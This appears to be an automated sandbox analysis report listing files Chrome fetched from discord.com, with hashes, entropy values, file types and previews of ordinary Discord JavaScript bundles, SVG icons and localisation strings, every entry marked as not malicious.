                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/ba88bbd1342d3f000e33.svg
                                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 90 59.19">. <defs>. <style>. .cls-1{fill:#6a94ff}.cls-2{fill:#a9c7ff}.cls-3{fill:#202225}. </style>. </defs>. <g id=".._2" data-name=".. 2">. <g id="Layer_1" data-name="Layer 1">. <path class="cls-1" d="M89.59 19.89 84.93 8.38a5.51 5.51 0 0 0-7.19-3l-5.67 2.25A12.42 12.42 0 0 0 56 .91L45.48 5.16c-1.84 4.11-5.48 9.72-11.59 9.52a8.55 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33l-12.66 5.13a12.42 12.42 0 0 0-6.9 16l-5 2A5.52 5.52 0 0 0 .4 42.61l4.67 11.51a5.51 5.51 0 0 0 7.18 3l5.64-2.28A12.43 12.43 0 0 0 32 58.28l40.54-16.44a12.43 12.43 0 0 0 7.73-12.22l6.28-2.54a5.52 5.52 0 0 0 3.04-7.19ZM11.65 52.94a2.76 2.76 0 0 1-3.59-1.52l-3.63-9A2.76 2.76 0 0 1 6 38.87l4-1.65 5.69 14.07ZM22.33 39.6a3.72 3.72 0 1 1 2.06-4.85 3.71 3.71 0 0 1-2.06 4.85Zm33.36-1.55-11.77 4.77A10.61 10.61 0 0 1 30.11 37l-3.33-8.23A4 4 0 0 1 29 23.56l23.31-9.44a4 4 0 0 1 5.18 2.19l3.63 9a9.8 9.8 0 0 1-5.43 12.74ZM67.49 21a3.73 3.73 0 1 1
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13439139
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.808610998286648
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:98304:1AvCPlsOiaglsm9+vhvK+gzbTdPME8ONXOOTnSPefvVAsHZ7e+dwbJ389b/:1flXgAhvK+gzbTdPMENOQF5do389b/
                                                                                                                                                                                                                                                                                    MD5:A4DA9A05EDCC0A143CFB01E6A2EA6C82
                                                                                                                                                                                                                                                                                    SHA1:4539C55BEB16EF266B8CD96CEB182B3586F4F3E3
                                                                                                                                                                                                                                                                                    SHA-256:8CA3F5FE1A933E1A5218FD072DD09C39BDEDA270EE93833178CD91D12DD50A9C
                                                                                                                                                                                                                                                                                    SHA-512:41AD2D9DA0BFF5AADB16D5760864D46638984EDB83E0FA75647C93D5280F316D6BA23E26F72CD5FCCCCA928CC20710F4EE4C5F79AD2946A0D12D4021FFA9E724
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(()=>{var e={595173:function(e,t,n){var r={"./2017-11-16.mp4":"221825","./channel-following.png":"247815","./discovery.jpg":"778608","./g250k-cl.mp4":"909851","./hypesquad-hack-week/header.png":"819091","./hypesquad-hack-week/paladins-loot.png":"742305","./ko-new-year.jpg":"265921","./polish-week.png":"560437","./special-template/desktop-cta.png":"846033","./special-template/update-badge.svg":"623904","./stickers-launch/2020_PMM_STICKERS_Mrkt_BlogHdr_2500x1000.png":"928400","./stickers-launch/2020_PMM_STICKERS_Mrkt_DesktopHero_Left_180x220.png":"148821","./stickers-launch/2020_PMM_STICKERS_Mrkt_DesktopHero_Right_180x220.png":"982563","./stickers-launch/2020_PMM_STICKERS_Mrkt_Desktop_Changelog_658X220.png":"331628","./stickers-launch/2020_PMM_STICKERS_Mrkt_Desktop_FooterCTA_238x220.png":"765198","./stickers-launch/2020_PMM_STICKERS_Mrkt_MobileHero_375x190.png":"199469","./stickers-launch/2020_PMM_STICKERS_Mrkt_Mobile_FooterCTA_343x78.png":"199612","./store.jpg":"926213"};function i(e){r
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):2058
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.614306214221163
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:CVHe7HtOty0VulV1/8CXP0Cjek7aj4clug9ai:iANEyxx8UPTXaj4cogIi
                                                                                                                                                                                                                                                                                    MD5:E1349377226366F95F85AB9EAC4586D3
                                                                                                                                                                                                                                                                                    SHA1:9A3A00B6E6AB0A240363F4E4DB2F5288227FF76B
                                                                                                                                                                                                                                                                                    SHA-256:2CA673A9914A35A230469A8A0FD6B4DB293B236DEA391633B53339AFE577A92E
                                                                                                                                                                                                                                                                                    SHA-512:7C16967D1960CDE4914F71B6FE347A7764AAED42366A87920597D225F3874B5B34A00C5089564BEBF0A919C419049DB99B27128CC81BC28A1492460FD199F9E7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/a5ec2b74d0cc337d4481.svg
                                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 45 45" xml:space="preserve">. <defs>. <clipPath id="a" clipPathUnits="userSpaceOnUse">. <path d="M0 36h36V0H0v36Z"/>. </clipPath>. <mask id="b">. <g>. <rect x="0" y="0" width="100" height="100" fill="white" />. <path d="M11.708 29.849a1.296 1.296 0 1 0-2.591-.001 1.296 1.296 0 0 0 2.591 0" fill="black"/>. </g>. </mask>. </defs>. <g>. <g>. <g clip-path="url(#a)" transform="matrix(1.25 0 0 -1.25 0 45)" mask="url(#b)">. <g>. <path d="M12.75 18.25c1.226-2.195 1.855 1.361 9.313 2.625 7.457 1.264 13.728-4.454 13.859-5.413C36.053 14.504 31.474 6 26.459 6h-15.71C6.607 6 3.727 13.224 6.75 17.438c0 0 4.5 3.5 6 .812" fill="white"/>. </g>. <g>. <path d="M13.008 17.864C8.02 10.927 6.968 6 10.75 6c-4.142 0-6.577 6.187-4.468 11.031.463 1.064 1.758 2.492 1.758 2.492l4.18.008c.162-.32.598-1.366.79-1.667" fill="white"/>. </g>. <g>. <path d
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13325)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13374
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.33229367944175
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:c9jPMDYeG0dPbPDjzw4WDhiElYrskCLdHWQBC7dr1m+8LBpDtOnyUotvLfQE2u:c9jPMRLjZ0usbxwdr1QBpDtOy3JT
                                                                                                                                                                                                                                                                                    MD5:D0C788B157FF96A2DD902C97BFC889F6
                                                                                                                                                                                                                                                                                    SHA1:6CDE0BD611B34B15CA15437CA5AC4F77DE01ADA8
                                                                                                                                                                                                                                                                                    SHA-256:05A00FBAFFC4A7254C9B631FF0E81BE546DC275BE1D6F992C36849222D0B73F7
                                                                                                                                                                                                                                                                                    SHA-512:170615E3DE829D517662BE32C762B76B013163FA040C2EEDF89C865A9CEE1CEEDA7EE305BE27CD3A724832571A94B5A26FB3BB9D9A1D1C5386081F206A1E1436
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["78187"],{526988:function(t,n,r){var e=r(354848),o=r(938507),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a function")}},24033:function(t,n,r){var e=r(622281),o=String,i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not an object")}},953326:function(t,n,r){var e=r(299623),o=r(980855),i=r(49693),u=function(t){return function(n,r,u){var c,f=e(n),a=i(f),s=o(u,a);if(t&&r!=r){for(;a>s;)if((c=f[s++])!=c)return!0}else for(;a>s;s++)if((t||s in f)&&f[s]===r)return t||s||0;return!t&&-1}};t.exports={includes:u(!0),indexOf:u(!1)}},332916:function(t,n,r){var e=r(581031),o=e({}.toString),i=e("".slice);t.exports=function(t){return i(o(t),8,-1)}},381740:function(t,n,r){var e=r(740362),o=r(666061),i=r(347722),u=r(97131);t.exports=function(t,n,r){for(var c=o(n),f=u.f,a=i.f,s=0;s<c.length;s++){var p=c[s];!e(t,p)&&!(r&&e(r,p))&&f(t,p,a(n,p))}}},251069:function(t,n,r){var e=r
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (30648)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):30717
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.206707568753238
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:TwGTw5tUigrB6gmkOgVZEgFSgIvAwgvS+DWGMg4kMEq1gHg0GP4CxZB1Ku0:UGc5twI4ZPMveDWGVM7P4gtKu0
                                                                                                                                                                                                                                                                                    MD5:A318DA370F7EE99D24CA9BBCE1926BAA
                                                                                                                                                                                                                                                                                    SHA1:2BF58DD3FEE18AAF9E3E8F190E985EC8D9C6232E
                                                                                                                                                                                                                                                                                    SHA-256:F22EA3781C56177B2D949FEF7F7935C1248446FCAF41D43534C6EBE94675E46E
                                                                                                                                                                                                                                                                                    SHA-512:3BD5B1906CF0F1D3108222AA64445CEF3990B7692546A22BE427A4C5EDED573E18EB32C410E2D0A25AA506DFF5383A5B444A612AAD712991E3102AA424FE912F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["20346"],{237267:function(e,o,t){t.r(o),o.default=JSON.parse('{"14o9ZW":"Gmail","dnOc/v":"We play together to win, rank up, or beat challenges.","XE0tLS":"Join Application","axCpsL":"Anime, Roman History, Sad Hamsters, etc...","27hWtb":"Minimal","PZT7pq":"Show negative scored content","/A+uVF":"Guild Profile","jVshKi":"Servers","z4VNPz":"Missed call","ZcHHvr":"Create a badge and tag for your Guild","/W5u5u":["AutoMod quarantined ",[8,"userHook",[[8,"$b",[[1,"user"]]]]]," for violating content in their user profile"],"D0lNBA":"You\'ve been sending too many Guild applications.","QU/Rw8":"Allows members to talk in voice and hear others in this channel\'s threads.","l536p6":"Uses AutoMod","2EwC2d":"Abuse or harassment","Eorjm5":"Adjust Server/Channel Recommendations","TwueCw":"Selected","HE3oV1":"Reply","kPwMOz":"Customize your Guild\'s look","+E7Irq":"Please provide more details","nftD29":[[8,"backHook",[[
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (16223)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):16272
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.580834693610943
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:M7bek/HNfVFGOSH4vgk+FaHXHrC7Cq3DssOeyjY+0th:gbek/7VwEgk6a3LC7Cq3kan
                                                                                                                                                                                                                                                                                    MD5:1CE0867EF5AB681018D7E32E7197DD4D
                                                                                                                                                                                                                                                                                    SHA1:09300C5379BBA5143C4457F5A9C5CAB29815DA43
                                                                                                                                                                                                                                                                                    SHA-256:FE0EACF4489CF4CA8E0314B19F4A52E69E369497ECDEF2F4EE20A7541D16F217
                                                                                                                                                                                                                                                                                    SHA-512:23701CCBA34CCB5365895BDD24C95BF055E8F81BCEC723F5F1051856E9DFCCB3D41F2F1E535FDB8E73A51D27DFFEB800F345486A111257BDF2C09366B7F9B7CD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/b54790681a89c77f55ad.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["10778"],{418757:function(e){e.exports="/assets/b7d1dc6b0746101719c5.png"},494207:function(e){e.exports="/assets/85153fe71873da0f5802.svg"},320440:function(e){e.exports="/assets/4676f063fb9f129e9fdb.svg"},561030:function(e){e.exports="/assets/75c80c4160a66983ae66.svg"},419185:function(e){e.exports="/assets/47e72e6360ce185adab6.svg"},826806:function(e){e.exports="/assets/fb418059f41b569abca4.svg"},123013:function(e){e.exports="/assets/98cacc492d985565ed4f.png"},540909:function(e){e.exports="/assets/2a5176cf2bd0ccdf0e7b.svg"},232454:function(e){e.exports="/assets/ad2027f11792ba8c0e7f.svg"},526916:function(e){e.exports="/assets/f38b6aefa24dc9a54765.svg"},29654:function(e){e.exports="/assets/dde11474b0623b723861.svg"},820160:function(e,t,n){n.d(t,{Z:function(){return c}});var r=n(200651);n(192379);var i=n(481060),s=n(813197),l=n(388032),a=n(510186);function c(e){let{icon:t,onChange:n}=e;return(0,r.jsx)(i.Fo
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):24565
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.000976601202208
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:xakxHbO0x9ipfSEuH44B445H44Q544Aq44Q4P44ZF944Q4Q4424Qb444nxWl444p:xZxH5ripqEuH44B445H44Q544Aq44Q4+
                                                                                                                                                                                                                                                                                    MD5:EC2C34CADD4B5F4594415127380A85E6
                                                                                                                                                                                                                                                                                    SHA1:E7E129270DA0153510EF04A148D08702B980B679
                                                                                                                                                                                                                                                                                    SHA-256:128E20B3B15C65DD470CB9D0DC8FE10E2FF9F72FAC99EE621B01A391EF6B81C7
                                                                                                                                                                                                                                                                                    SHA-512:C1997779FF5D0F74A7FBB359606DAB83439C143FBDB52025495BDC3A7CB87188085EAF12CC434CBF63B3F8DA5417C8A03F2E64F751C0A63508E4412EA4E7425C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:............ .h...F... .... .........00.... ..%..V......... ..$...:..(....... ..... ..........................................dX2.dX..dW..dW..dX..dX..dX..dX2.........................dW..dW..dX..eX..eX..eX..eX..eX..eX..dW..dW..dW..............dW..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........dW..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW......dX2.dW..eX..eX..|q......eX..eX..eX..eX......|q..eX..eX..eX..eX2.dW..eX..eX..........................................eX..eX..eW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..............eX..........eX..............eX..eX..dW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..~s..................................~s..eX..eX..dW..dW..eX..eX..eX..................................eX..eX..eX..dW..dX2.eX..eX..eX..h[..........{p..{p..........h[..eX..eX..dW..eW2.....dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........eX..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..e
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (9343)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9392
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.496058554582109
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:U3JcOTCKCo5Ui4C5qMZJcqjZEuWXRW8yVSIeUpSpWgAUcONyeHjAZ2dQUs0ne+6e:U3HblfAAr3rkRa48Ola7AsVDzotRx
                                                                                                                                                                                                                                                                                    MD5:620E3912CA81698D38461279457F47BA
                                                                                                                                                                                                                                                                                    SHA1:095AB7E19994FCD27D499156F9C9EC4C1DE8017E
                                                                                                                                                                                                                                                                                    SHA-256:CD7A4035ADE2DDE6044138275B8AAEC708F2511EAF9469FB7976B0913017B685
                                                                                                                                                                                                                                                                                    SHA-512:FFE5D97CC1D1B58AD63CD87C5DCAAA2590598E4C8BA6166B735F86C0F9E3C32F35E1794DD6FC13647345F7EABB0FE8918BE55AAB49F4084E62835606FC525CCB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["84956"],{986197:function(e,t,n){var i=n(990547),o=n(544891),r=n(570140),a=n(881052),s=n(626135),u=n(573261),l=n(545851),g=n(109488),d=n(794099),c=n(981631);n(135200);var m=n(388032);t.Z={resetSuggestions:()=>r.Z.dispatch({type:"POMELO_SUGGESTIONS_RESET"}),async fetchSuggestionsRegistration(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:1500;if(!!(0,d.vc)()){r.Z.dispatch({type:"POMELO_SUGGESTIONS_RESET"});try{var n;let i=await o.tn.get({url:c.ANM.POMELO_SUGGESTIONS_UNAUTHED,query:null==e?void 0:{global_name:e},timeout:t,rejectWithError:!0});if(i.ok&&(null===(n=i.body)||void 0===n?void 0:n.username)!=null)return r.Z.dispatch({type:"POMELO_REGISTRATION_SUGGESTIONS_SUCCESS",suggestion:i.body,source:e})}catch(e){return}}},async fetchSuggestions(e){if(!!(0,g.P)())try{var t;r.Z.dispatch({type:"POMELO_SUGGESTIONS_FETCH",usernameSuggestionLoading:!0});let n=await o.tn.get({url:c.ANM.POMELO_SUGG
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (21762)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):21811
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.462655463719556
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:f1bjtqrVapZjquHCWnJcJhcby8XziQBy6HUKVMov5hHKs80K:JjtOVaJDnJcPc+EWQ8EM65RR8l
                                                                                                                                                                                                                                                                                    MD5:0FBB77D1B69F18DF0FDCF836DE1C4106
                                                                                                                                                                                                                                                                                    SHA1:E8CE4037B97732809F1E1BF24992959C678F2118
                                                                                                                                                                                                                                                                                    SHA-256:279E49A00A41A18545CF319B5A8B571FD48CFCC4B78A361BBE75A33CE7A4F71A
                                                                                                                                                                                                                                                                                    SHA-512:F73E3B25561D0D3307C7DD9D505F84101897CFA70737D757AED8D95BDC6A2CE116FD114674DD0BBE666AABE2176B0EEF150A5D4EE2C7C3CCE815A5CA73215D03
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["71984"],{772425:function(t,r,n){var e=n(933676),o=n(938507),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a constructor")}},603528:function(t,r,n){var e=n(838957),o=TypeError;t.exports=function(t,r){if(e(r,t))return t;throw o("Incorrect invocation")}},212036:function(t){t.exports="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof DataView},192291:function(t,r,n){var e,o,i,u=n(212036),f=n(325008),a=n(161581),c=n(354848),s=n(622281),y=n(740362),p=n(974971),h=n(938507),v=n(251069),d=n(859209),g=n(4340),l=n(838957),A=n(144748),w=n(276321),x=n(641236),b=n(457507),T=n(644659),E=T.enforce,I=T.get,R=a.Int8Array,m=R&&R.prototype,O=a.Uint8ClampedArray,M=O&&O.prototype,F=R&&A(R),U=m&&A(m),_=Object.prototype,L=a.TypeError,B=x("toStringTag"),C=b("TYPED_ARRAY_TAG"),S="TypedArrayConstructor",P=u&&!!w&&"Opera"!==p(a.opera),V=!1,N={Int8Array:1,Uint8Array:1,Uint8ClampedArray:1,Int16Array:2,U
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):137
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.7861988241054
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:t6WH7W+IjSKcvUVYEo0LvDmJS4RKb5KVErcHNDPqdcJqGrqL0:t6AbzUOC3mc4slmNDiiAe
                                                                                                                                                                                                                                                                                    MD5:7D883BA72B5DBC0229F5D1980205EE34
                                                                                                                                                                                                                                                                                    SHA1:678BDA23DF97E8B9C3B15E71C41E7B215D043F22
                                                                                                                                                                                                                                                                                    SHA-256:53A0F1F10860A6E4CF9BD3B4949C5DDE68888DBC96BA0DA1020C5958EFC214A5
                                                                                                                                                                                                                                                                                    SHA-512:E040F62517C951A0AB2ABC5038F22456E5862166E2A2346345464B9C4B63271CFBD1220BB14D2C39D7FACFD008848ACE682420F1EFE9F4F29265D7177A3C7E16
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<svg fill="none" height="12" viewBox="0 0 12 12" width="12" xmlns="http://www.w3.org/2000/svg"><path d="m5 2h2v8h-2z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12244)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):12293
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.57451570624678
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:KO87cE+wCFgcmzFFLt9Wq0f2/pEIcAB6QrIPF43JaW6rYuNBZegk:KO6cE+wCFgFL6q0fcpczipa58z
                                                                                                                                                                                                                                                                                    MD5:7F69DDAD9C9B8471930A1C320E285DBA
                                                                                                                                                                                                                                                                                    SHA1:C89EAD1B19A62CF6BBAD9CB46AF62535EE360DB7
                                                                                                                                                                                                                                                                                    SHA-256:AA17A6E2D044E6E64C1236AA1A983BE7D7C47FA0CD265C6E730928C81E81F33F
                                                                                                                                                                                                                                                                                    SHA-512:059008F59652CB0FF5B6FDFF4C72F78BC8933D355FC4D71424FC258A031D3BEB223CB416FAA85918A82B3715416030E2CF94346CA029725C3887DDE949C4EF0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["95393"],{392459:function(e){e.exports="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 66 38' width='66' height='38'%3E%3Crect x='0' y='0' width='66' height='38' style='fill: rgb(0, 0, 0); stroke: rgb(0, 0, 0);'%3E%3C/rect%3E%3C/svg%3E"},850259:function(e){e.exports="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='6.122 5.864 259 50' width='259' height='50'%3E%3Cpath fill='%23000000' fill-rule='evenodd' d='M 68.122 11.864 L 192.122 11.864 C 193.779 11.864 195.122 13.207 195.122 14.864 L 195.122 28.864 C 195.122 30.521 193.779 31.864 192.122 31.864 L 68.122 31.864 C 66.465 31.864 65.122 30.521 65.122 28.864 L 65.122 14.864 C 65.122 13.207 66.465 11.864 68.122 11.864 Z M 68.122 35.864 L 262.122 35.864 C 263.779 35.864 265.122 37.207 265.122 38.864 L 265.122 48.864 C 265.122 50.521 263.779 51.864 262.122 51.864 L 68.122 51.864 C 66.465 51.864 65.122 50.521 6
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (467)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):516
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.541837354544169
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:SM4krZur5/TdqA9WhD0AI5NzppzHjxDBTQYfmsSftb5+Youu4aO/QOFaWCUOBd5h:/4kU50Ag23NdDffmxftbcfu4AOB798hg
                                                                                                                                                                                                                                                                                    MD5:3803B930385AA579DDF315B689DB895A
                                                                                                                                                                                                                                                                                    SHA1:EA2FC1CF3A7FA94F6A92CB6ABD04E18F4EDE323B
                                                                                                                                                                                                                                                                                    SHA-256:3193C729E005740AE610C8806B538904D1FC62DACE38E4248DE7633147EC78C8
                                                                                                                                                                                                                                                                                    SHA-512:A8E21B2F9ADD5A038E12B914C2D23670983839B8BED3E9DA54D74AFC8B845CE396707F724DB46EB8EE31A2F02395E3B8E8979908F4F16CEC9533FEE65047C7CB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/0a52c6142094387fceed.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["88577"],{772416:function(i,a,o){o.r(a),a.default=JSON.parse('{"ofazSU":"Entendido","KUFsLi":"\xa1El cambio fue hecho!","yQfLwM":"Discord est\xe1 configurado en Espa\xf1ol. Puedes elegir otro idioma en \\"Ajustes de aplicaci\xf3n\\" > \\"Idioma\\".","09QGGB":"\xbfCambiar idioma?","xi8rEx":"\xbfTe gustar\xeda configurar Discord en Espa\xf1ol?","QkGMPz":"S\xed","jM7sUl":"No"}')}}]);.//# sourceMappingURL=0a52c6142094387fceed.js.map
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.022055208874201
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:PaniAKp18n:SnT
                                                                                                                                                                                                                                                                                    MD5:5DFB17ADA137F27939246A24FD5F7CE1
                                                                                                                                                                                                                                                                                    SHA1:6748CBADBAAA9216F6FC0C3C3B5F7CA786F3C8BA
                                                                                                                                                                                                                                                                                    SHA-256:E7E1364442A162805292D9693D57C84E66D37E27849E1EDC4C31A3436DEDF238
                                                                                                                                                                                                                                                                                    SHA-512:70A38493813CA097B394743E6ED33B2574079F500E5D9C911A8EC251E39C5BA47EC41214EE47B21BEF4D4392B2F3D507717282C2AE073A05FEC74542A2460F5D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnjkqJiyOoN-BIFDfwdehA=?alt=proto
                                                                                                                                                                                                                                                                                    Preview:Cg4KDA38HXoQGgUIoAEYAg==
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):113
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.460750616283363
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YGKjl8jwDEYRrajpHV+wJ6ARORzACDEYkayjY6v:YGKjDRrajpHV9LorMcE
                                                                                                                                                                                                                                                                                    MD5:30B15D37E2F2C6C09F35BCC56B64571A
                                                                                                                                                                                                                                                                                    SHA1:A5566ADA13410C39A4059BEC0FF59D51316D89CD
                                                                                                                                                                                                                                                                                    SHA-256:BE58D93E5BC2C48B3FB9C87BD7140109630195E84CCE67701FCCABCF5256BFE0
                                                                                                                                                                                                                                                                                    SHA-512:EE8E8192B3120D7A2FC9DCE3585D87FAAF689B2E03046C8B7F533FE3CBA408BF0E8614CA2AACD6ED21A206B4B461ECA507D5B38D01839CA9AC5B93971D1F7B10
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/api/v9/auth/location-metadata
                                                                                                                                                                                                                                                                                    Preview:{"consent_required":false,"country_code":"US","promotional_email_opt_in":{"required":false,"pre_checked":false}}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 39424, version 2.66
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):39424
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.995696618521677
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:768:RtWd6RsrMjeX+oUMPzo4niAVyynUFTyEatQHzV2h2TzpLJD5JoswdZB:/y6RsbDRzookyncNMQHzAALRovL
                                                                                                                                                                                                                                                                                    MD5:7F63813838E283AEA62F1A68EF1732C2
                                                                                                                                                                                                                                                                                    SHA1:C855806CB7C3CC1D29546E3E6446732197E25E93
